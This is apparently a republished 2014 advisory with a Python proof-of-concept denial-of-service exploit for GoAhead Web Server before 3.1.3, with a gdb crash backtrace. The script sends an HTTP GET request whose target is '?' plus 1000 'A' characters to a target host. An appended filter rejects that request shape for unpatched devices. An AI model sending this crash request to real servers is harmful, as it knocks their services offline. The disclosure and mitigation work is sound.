GoAhead Web Server 3.1.x - Denial of Service
Source: vfocus.net  Author: MESBAHI  Published: 2014-02-27
#!/usr/bin/python
  
'''
GoAhead Web Server versions prior to 3.1.3 are vulnerable to DoS. A fix exists for version 3.2.
The Web Server crashes completely once this request is received. The vulnerability doesn't seem to be exploitable on Linux versions ... could be wrong :) !
  
Official Issue Post:
https://github.com/embedthis/goahead/issues/77
  
(gdb) bt
#0  0x00007ffff7a50425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00007ffff7a53b8b in __GI_abort () at abort.c:91
#2  0x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201
#3  0x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:5039
#4  0x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=<optimized out>) at src/http.c:457
#5  0x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520
#6  complete (wp=0x40cfc0, reuse=1) at src/http.c:575
#7  0x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837
#8  0x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797
#9  socketEvent (wptr=0x40cfc0, mask=2, sid=<optimized out>) at src/http.c:735
#10 socketEvent (sid=<optimized out>, mask=2, wptr=0x40cfc0) at src/http.c:723
#11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=<optimized out>) at src/http.c:714
#12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327
#13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639
#14 socketProcess () at src/socket.c:623
#15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290
#16 0x00000000004012ee in main (argc=<optimized out>, argv=0x7fffffffdfd8, envp=<optimized out>) at src/goahead.c:146
'''
  
  
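import socket
import sys

# Target address and port are taken from the command line.
HOST = sys.argv[1]
PORT = int(sys.argv[2])

# Request target: a single '?' followed by 1000 'A' characters.
crash = '?'*1 + 'A' * 1000

# Request line plus a Host header, terminated by an empty line.
payload = 'GET ' + crash + ' HTTP/1.1\r\n'
payload += 'Host: ' + HOST + ':' + str(PORT) + '\r\n\r\n'

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((HOST, PORT))
# Encode explicitly so the socket receives bytes.
expl.send(payload.encode('ascii'))
data = expl.recv(1024)
print(data)
expl.close()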
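
Added example (not part of the original PoC and not GoAhead code): a request-line check that a front-end proxy or input filter could apply before traffic reaches an unpatched device, rejecting the shape of request sent above (a target that does not start with "/" and is about 1000 characters long). The length limit, method list, function name and sample host name are assumptions made for this illustration.

```python
import re

MAX_TARGET_LEN = 512  # assumed cap; set to the longest legitimate URL on the device
METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"}  # assumed allow-list
VERSION_RE = re.compile(r"HTTP/1\.[01]\Z")


def screen_request_line(raw):
    """Return (ok, reason) for the first line of a raw HTTP request (bytes)."""
    line, sep, _ = raw.partition(b"\r\n")
    if not sep:
        return False, "no CRLF-terminated request line"
    try:
        text = line.decode("ascii")
    except UnicodeDecodeError:
        return False, "non-ASCII bytes in request line"
    parts = text.split(" ")
    if len(parts) != 3:
        return False, "request line is not 'METHOD target VERSION'"
    method, target, version = parts
    if method not in METHODS:
        return False, "unexpected method"
    if not VERSION_RE.match(version):
        return False, "unexpected HTTP version"
    if len(target) > MAX_TARGET_LEN:
        return False, "request target too long"
    # An embedded server is an origin server, not a proxy: accept only
    # origin-form targets (leading "/") and "*" for OPTIONS.
    if not (target.startswith("/") or (method == "OPTIONS" and target == "*")):
        return False, "request target not in origin-form"
    return True, "ok"


# Constructed sample requests; device.example is a placeholder host.
HOST_HDR = b"Host: device.example\r\n\r\n"
SAMPLES = {
    "normal": b"GET /index.html?lang=en HTTP/1.1\r\n" + HOST_HDR,
    "poc_shape": b"GET ?" + b"A" * 1000 + b" HTTP/1.1\r\n" + HOST_HDR,
    "short_no_slash": b"GET ?AAAA HTTP/1.1\r\n" + HOST_HDR,
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, screen_request_line(raw))
```

The filter is a stopgap for devices that cannot be updated yet; the fix referenced in the issue linked above is the actual remediation.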
